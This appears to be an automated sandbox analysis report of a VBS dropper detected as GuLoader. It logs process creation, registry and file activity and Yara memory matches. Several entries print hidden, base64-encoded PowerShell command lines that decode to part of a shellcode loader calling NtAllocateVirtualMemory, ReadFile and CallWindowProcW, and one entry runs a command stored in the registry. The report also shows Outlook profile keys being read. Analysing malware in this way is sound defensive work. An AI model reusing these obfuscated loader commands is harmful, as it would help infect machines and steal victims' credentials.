Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uotckr0j.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vybs2gqu.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES34E6.tmp" "c:\Users\user\AppData\Local\Temp\CSC77023F4354E6477E97855CB603CA0.TMP"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES728B.tmp" "c:\Users\user\AppData\Local\Temp\CSC9CB81DB86B7E400B9F74BAF89293FF3.TMP"

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20211125

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\Depopulato2.dat

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winVBS@30/40@1/2

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Mutant created: \Sessions\1\BaseNamedObjects\ihrYOjDo
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2528:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2528:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:304:WilStaging_02

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\DETAILS.vbs"

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source:	Binary string: $pm/C:\Users\user\AppData\Local\Temp\mla4kvb3.pdb source: powershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmp
Source:	Binary string: $pm/C:\Users\user\AppData\Local\Temp\vybs2gqu.pdb source: powershell.exe, 0000000E.00000002.16353125853.0000000005015000.00000004.00000001.sdmp
Source:	Binary string: $pm/C:\Users\user\AppData\Local\Temp\uotckr0j.pdb source: powershell.exe, 0000000D.00000002.16211068158.0000000004F11000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16210155377.0000000004E74000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000014.00000000.16108270980.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.16237325177.0000000009770000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.16379281085.00000000098B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.15295840627.0000000009B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.16194415539.0000000002D20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.15018322075.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.15958445085.0000000002D20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.16334182427.0000000003000000.00000040.00000001.sdmp, type: MEMORY

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFA